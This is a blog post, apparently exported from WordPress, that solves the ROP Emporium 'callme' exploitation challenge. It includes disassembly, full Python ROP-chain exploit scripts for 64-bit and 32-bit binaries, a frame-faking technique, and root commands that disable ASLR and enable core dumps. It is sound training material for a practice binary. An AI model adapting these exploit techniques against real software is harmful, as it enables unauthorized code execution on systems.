{"id":992,"date":"2019-11-01T13:41:40","date_gmt":"2019-11-01T17:41:40","guid":{"rendered":"https:\/\/blog.lamarranet.com\/?p=992"},"modified":"2019-12-18T10:56:04","modified_gmt":"2019-12-18T15:56:04","slug":"rop-emporium-callme-solution","status":"publish","type":"post","link":"https:\/\/blog.lamarranet.com\/index.php\/rop-emporium-callme-solution\/","title":{"rendered":"ROP Emporium | callme Solution"},"content":{"rendered":"

Reliably make consecutive calls to imported functions. Use some new techniques and learn about the Procedure Linkage Table.<\/p>\n

The binary and challenge description can be found here:
\nhttps:\/\/ropemporium.com\/challenge\/callme.html<\/a><\/p>\n

The 64-bit version of this challenge is actually very similar to the previous challenge, though we’re now making multiple function calls that require arguments instead of just one. The 32-bit version, however, requires a bit more thought. So I’ll cover solutions to both versions.<\/p>\n

64-bit Version<\/h1>\n

The challenge page gives us a lot of info to reduce the need to do any RE, though it doesn’t eliminate that. We know that we need to pass the integers 1, 2, and 3 to the callme functions. But how are the integers passed? 64-bit programs usually pass integers via the registers, but which registers? Let’s look at the assembly for callme_one() <\/span>to figure it out:<\/p>\n

\r\nandrew ~\/callme $ r2 libcallme.so \r\n[0x000007f0]> aa\r\n[Cannot analyze at 0x000007e0g with sym. and entry0 (aa)\r\nCannot analyze at 0x000007e8\r\n[x] Analyze all flags starting with sym. and entry0 (aa)\r\n[0x000007f0]> pdf @ sym.callme_one\r\n\u250c (fcn) sym.callme_one 228\r\n\u2502   sym.callme_one (int32_t arg1, int32_t arg2, int32_t arg3);\r\n\u2502           ; var int32_t var_1ch @ rbp-0x1c\r\n\u2502           ; var int32_t var_18h @ rbp-0x18\r\n\u2502           ; var int32_t var_14h @ rbp-0x14\r\n\u2502           ; var int32_t var_8h @ rbp-0x8\r\n\u2502           ; arg int32_t arg1 @ rdi\r\n\u2502           ; arg int32_t arg2 @ rsi\r\n\u2502           ; arg int32_t arg3 @ rdx\r\n\u2502           0x000008f0      push rbp\r\n\u2502           0x000008f1      mov rbp, rsp\r\n\u2502           0x000008f4      sub rsp, 0x20\r\n\u2502           0x000008f8      mov dword [var_14h], edi                   ; arg1\r\n\u2502           0x000008fb      mov dword [var_18h], esi                   ; arg2\r\n\u2502           0x000008fe      mov dword [var_1ch], edx                   ; arg3\r\n\u2502           0x00000901      cmp dword [var_14h], 1\r\n\u2502       \u250c\u2500< 0x00000905      jne 0x9bb\r\n\u2502       \u2502   0x0000090b      cmp dword [var_18h], 2\r\n\u2502      \u250c\u2500\u2500< 0x0000090f      jne 0x9bb\r\n\u2502      \u2502\u2502   0x00000915      cmp dword [var_1ch], 3\r\n\u2502     \u250c\u2500\u2500\u2500< 0x00000919      jne 0x9bb\r\n<\/pre>\n
We can see that the values of EDI, ESI, and EDX are saved to places on the stack reserved for local variables. We can see that EDI is compared to 1, ESI is compared to 2, and EDX is compared to 3. So our ROP chain will need to include a way of getting those values saved to those registers before calling the callme<\/code> functions.<\/p>\n
Past challenges included “useful” functions. Using rabin2<\/code>, we see two symbols:<\/p>\n
\r\nandrew ~\/callme $ rabin2 -s callme | grep useful\r\n039 0x00001a57 0x00401a57  LOCAL   FUNC   74 usefulFunction\r\n076 0x00001ab0 0x00401ab0 GLOBAL NOTYPE    0 usefulGadgets\r\n<\/pre>\n
While usefulGadgets <\/span>isn’t a function, it’s easy enough to find with objdump<\/code>:<\/p>\n
\r\nandrew ~\/callme $ objdump -Mintel --no-show-raw-insn -d callme \r\n...\r\n0000000000401ab0 <usefulGadgets>:\r\n  401ab0:       pop    rdi\r\n  401ab1:       pop    rsi\r\n  401ab2:       pop    rdx\r\n  401ab3:       ret    \r\n  401ab4:       nop    WORD PTR cs:[rax+rax*1+0x0]\r\n  401abe:       xchg   ax,ax\r\n...\r\n<\/pre>\n
We can also find it in radare2 by scrolling through Visual mode:<\/p>\n
\"\"<\/p>\n
That gadget, at 0x401ab0<\/code>, is exactly what we need. Pop 3 items off the stack into the necessary registers, followed by ret<\/code>.<\/p>\n
So when we build this exploit, we’ll need need the buffer to contain the address for the gadget (0x401ab0<\/code>), the 3 integer values (1, 2, & 3), and the address of the callme<\/code> function. That will repeat 3 times, once for each callme<\/code> function. The input should look something like this:<\/p>\n
\r\n"A" * 40 => buffer\r\nAddress1 => usefulGadget        \u2500\u2510\r\nInteger1 => 0x0000000000000001   \u2502\r\nInteger2 => 0x0000000000000002   \u251c\u2500 Repeats 3 times\r\nInteger3 => 0x0000000000000003   \u2502\r\nAddress2 => callme_one()        \u2500\u2518\r\n<\/pre>\n
Now I just need the addresses of the callme<\/code> functions:<\/p>\n
\r\nandrew ~\/callme $ rabin2 -s callme | grep callme_\r\n004 0x00001810 0x00401810 GLOBAL   FUNC   16 imp.callme_three\r\n008 0x00001850 0x00401850 GLOBAL   FUNC   16 imp.callme_one\r\n011 0x00001870 0x00401870 GLOBAL   FUNC   16 imp.callme_two\r\n<\/pre>\n
Solution<\/h2>\n
As a final solution, I put together this Python script:<\/p>\n
\r\n#!\/usr\/bin\/env python3\r\nimport struct\r\nimport sys\r\n\r\ngadget = struct.pack("Q", 0x401ab0) # pop rdi; pop rsi; pop rdx; ret\r\none = struct.pack("Q", 0x1)\r\ntwo = struct.pack("Q", 0x2)\r\nthree = struct.pack("Q", 0x3)\r\n\r\nbuf  = b"A" * 40\r\nbuf += gadget\r\nbuf += one\r\nbuf += two\r\nbuf += three\r\nbuf += struct.pack("Q", 0x401850) # callme_one()\r\nbuf += gadget\r\nbuf += one\r\nbuf += two\r\nbuf += three\r\nbuf += struct.pack("Q", 0x401870) # callme_two()\r\nbuf += gadget\r\nbuf += one\r\nbuf += two\r\nbuf += three\r\nbuf += struct.pack("Q", 0x401810) # callme_three()\r\n\r\nsys.stdout.buffer.write(buf)\r\n<\/pre>\n
Running the exploit:<\/p>\n
\r\nandrew ~\/callme $ .\/exploit.py | .\/callme \r\ncallme by ROP Emporium\r\n64bits\r\n\r\nHope you read the instructions...\r\n> ROPE{a_placeholder_32byte_flag!}\r\n<\/pre>\n
32-bit Version<\/h1>\n
Before diving into the 32-bit version, I would like to point out a very useful Phrack article that describes a technique for chaining function calls in a ROP chain: http:\/\/phrack.org\/issues\/58\/4.html#article<\/a>
\nSpecifically, the “3.3 – frame faking” section. I would recommend reading that before attempting this.<\/p>\n
There’s one major difference between the 32-bit version and 64-bit version. Arguments are passed to the callme<\/code> functions via the stack in the 32-bit version. Let’s look at the disassembly for callme_one()<\/span>:<\/p>\n
\r\n[0x000005a0]> pdf @ sym.callme_one\r\n\u250c (fcn) sym.callme_one 253\r\n\u2502   sym.callme_one (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h);\r\n\u2502           ; var int32_t var_ch @ ebp-0xc\r\n\u2502           ; var int32_t var_4h @ ebp-0x4\r\n\u2502           ; arg int32_t arg_8h @ ebp+0x8\r\n\u2502           ; arg int32_t arg_ch @ ebp+0xc\r\n\u2502           ; arg int32_t arg_10h @ ebp+0x10\r\n\u2502           0x000006d0      push ebp\r\n\u2502           0x000006d1      mov ebp, esp\r\n\u2502           0x000006d3      push ebx\r\n\u2502           0x000006d4      sub esp, 0x14\r\n\u2502           0x000006d7      call entry0\r\n\u2502           0x000006dc      add ebx, 0x1924\r\n\u2502           0x000006e2      cmp dword [arg_8h], 1\r\n\u2502       \u250c\u2500< 0x000006e6      jne 0x7ab\r\n\u2502       \u2502   0x000006ec      cmp dword [arg_ch], 2\r\n\u2502      \u250c\u2500\u2500< 0x000006f0      jne 0x7ab\r\n\u2502      \u2502\u2502   0x000006f6      cmp dword [arg_10h], 3\r\n\u2502     \u250c\u2500\u2500\u2500< 0x000006fa      jne 0x7ab\r\n<\/pre>\n
You can see that the integers 1, 2, and 3 are compared to arguments on the stack. These are ebp+0x8<\/code>, ebp+0xc<\/code>, and ebp+0x10<\/code> respectively.<\/p>\n
This makes the job of calling consecutive functions a little more difficult. If we only needed to call one of these functions, our exploit payload would look something like this:<\/p>\n
\r\n"A" * 40 => buffer\r\nAddress1 => callme_one()\r\nAddress2 => dummy return value\r\nInteger1 => 0x00000001\r\nInteger2 => 0x00000002\r\nInteger3 => 0x00000003\r\n<\/pre>\n
However, since we need to call callme_two() <\/span>right afterward, we can’t just put it’s address in the spot of Address2<\/code> because that<\/em> is going to need it’s own saved return value, which is where Integer1<\/code> currently sits.<\/p>\n
We can, however, use the “frame faking” method described in the Phrack article<\/a>. First, we need to find a \"leave; ret\"<\/code> gadget, which is a typical function epilogue. The leave<\/code> instruction is equivalent to mov esp, ebp; pop ebp <\/span>while the ret<\/code> instruction is simply pop eip<\/span>. For this to work, our buffer of A’s needs to stop before the saved EBP value. We overwrite the saved EBP value with a pointer to the next “frame’s” saved EBP value. We overwrite the saved EIP pointer with a pointer to the “leaveret” gadget. After that the first “frame” begins, which includes a saved EBP value (which is a pointer to the next frame’s EBP), a pointer to the first function call (callme_one() <\/span>in this case), a pointer to the leaveret gadget, followed by the required arguments. I’ll try to visualize this:<\/p>\n
\r\n  Address  |   Content  | Description\r\n-----------+------------+-------------\r\n0x00000000 |  "A" * 40  | Buffer\r\n0x00000020 | 0x00000028 | Fake ebp0 pointing to next ebp\r\n0x00000024 | GadgetAddr | Address to leaveret gadget\r\n0x00000028 | 0x00000040 | Fake ebp1 pointing to fake ebp2  \u2500\u2510\r\n0x0000002c | callme_one | Address to callme_one()           \u2502\r\n0x00000030 | GadgetAddr | Address to leaveret gadget        \u251c\u2500 Repeats 3 times\r\n0x00000034 | 0x00000001 | Integer 1                         \u2502\r\n0x00000038 | 0x00000002 | Integer 2                         \u2502\r\n0x0000003c | 0x00000003 | Integer 3                        \u2500\u2518\r\n<\/pre>\n
The only problem with this approach is that you need the exact addresses of your fake EBP values on the stack. I could easily find where everything is on the stack by running the program through a debugger, like GDB or rardare2. However, the stack addresses will be different as the environment variables differ when run through debuggers. Instead, I’ll enable core dumps, cause a segfault, and analyze the dump in a debugger. Also, I’ll want to make sure ASLR is disabled:<\/p>\n
\r\nandrew ~\/callme32 $ sudo -i\r\n\r\nroot ~ # echo 0 > \/proc\/sys\/kernel\/randomize_va_space\r\n\r\nroot ~ # ulimit -c unlimited\r\n\r\nroot ~ # echo core > \/proc\/sys\/kernel\/core_pattern\r\n\r\nroot ~ # exit\r\nlogout\r\n\r\nandrew ~\/callme32 $ python2 -c 'print "A"*45' | .\/callme32 \r\ncallme by ROP Emporium\r\n32bits\r\n\r\nHope you read the instructions...\r\n> Segmentation fault (core dumped)\r\n\r\nandrew ~\/callme32 $ ls\r\ncallme32  core.2458  encrypted_flag.txt  key1.dat  key2.dat  libcallme32.so\r\n<\/pre>\n
Now that I have the core dump, I can analyze it in radare2. I’ll see the value of the EIP register, search for that value (since I know it’s on the stack) and subtract 8 from that to get the location of the saved EBP pointer:<\/p>\n
\r\nandrew ~\/callme32 $ r2 core.2458\r\nSetting up coredump arch-bits to: x86-32\r\nSetting up coredump: Registers have been set\r\nSetting up coredump: 22 maps have been found and created\r\n\r\n[0x08000a41]> dr eip\r\n0x08000a41\r\n\r\n[0x08000a41]> \/x 410a0008\r\nSearching 4 bytes in [0xfffdd000-0xffffe000]\r\nhits: 1\r\nSearching 4 bytes in [0xf7ffd000-0xf7ffe000]\r\nhits: 0\r\n...snip...\r\nSearching 4 bytes in [0x8049000-0x804a000]\r\nhits: 0\r\nSearching 4 bytes in [0x8048000-0x8049000]\r\nhits: 0\r\n0xffffd13c hit0_0 410a0008\r\n\r\n[0x08000a41]> fs search\r\n\r\n[0x08000a41]> f\r\n0xffffd13c 4 hit0_0\r\n<\/pre>\n
The saved EIP return value was at 0xffffd13c, which means the saved EBP value was at 0xffffd138.<\/p>\n
Solution<\/h2>\n
For my script, I made it easy by requiring only the location of the original saved EBP value. The calculations are automatically done to get each saved EBP value to point to the next.<\/p>\n
\r\n#!\/usr\/bin\/env python3\r\nimport struct\r\nimport sys\r\nimport time\r\n\r\nleaveret = struct.pack("I", 0xf7fca635) # leave; ret\r\none = struct.pack("I", 0x1)\r\ntwo = struct.pack("I", 0x2)\r\nthree = struct.pack("I", 0x3)\r\nebp = 0xffffd138  # Location of the original saved EBP value on the stack\r\n\r\nbuf  = b"A" * 40\r\nbuf += struct.pack("I", ebp + 8) # fake ebp0\r\nbuf += leaveret\r\nbuf += struct.pack("I", ebp + 32) # fake ebp1\r\nbuf += struct.pack("I", 0x080485c0) # callme_one()\r\nbuf += leaveret\r\nbuf += one\r\nbuf += two\r\nbuf += three\r\nbuf += struct.pack("I", ebp + 56) # fake ebp2\r\nbuf += struct.pack("I", 0x08048620) # callme_two()\r\nbuf += leaveret\r\nbuf += one\r\nbuf += two\r\nbuf += three\r\nbuf += struct.pack("I", ebp + 80) # fake ebp3\r\nbuf += struct.pack("I", 0x080485b0) # callme_three()\r\nbuf += leaveret\r\nbuf += one\r\nbuf += two\r\nbuf += three\r\n\r\nsys.stdout.buffer.write(buf)\r\n<\/pre>\n
Running the exploit:<\/p>\n
\r\nandrew ~\/callme32 $ .\/exploit.py | .\/callme32 \r\ncallme by ROP Emporium\r\n32bits\r\n\r\nHope you read the instructions...\r\n> ROPE{a_placeholder_32byte_flag!}\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
Reliably make consecutive calls to imported functions … Continue readingROP Emporium | callme Solution<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-992","post","type-post","status-publish","format-standard","hentry","category-solutions"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/992","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=992"}],"version-history":[{"count":37,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/992\/revisions"}],"predecessor-version":[{"id":1120,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/992\/revisions\/1120"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=992"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=992"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=992"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}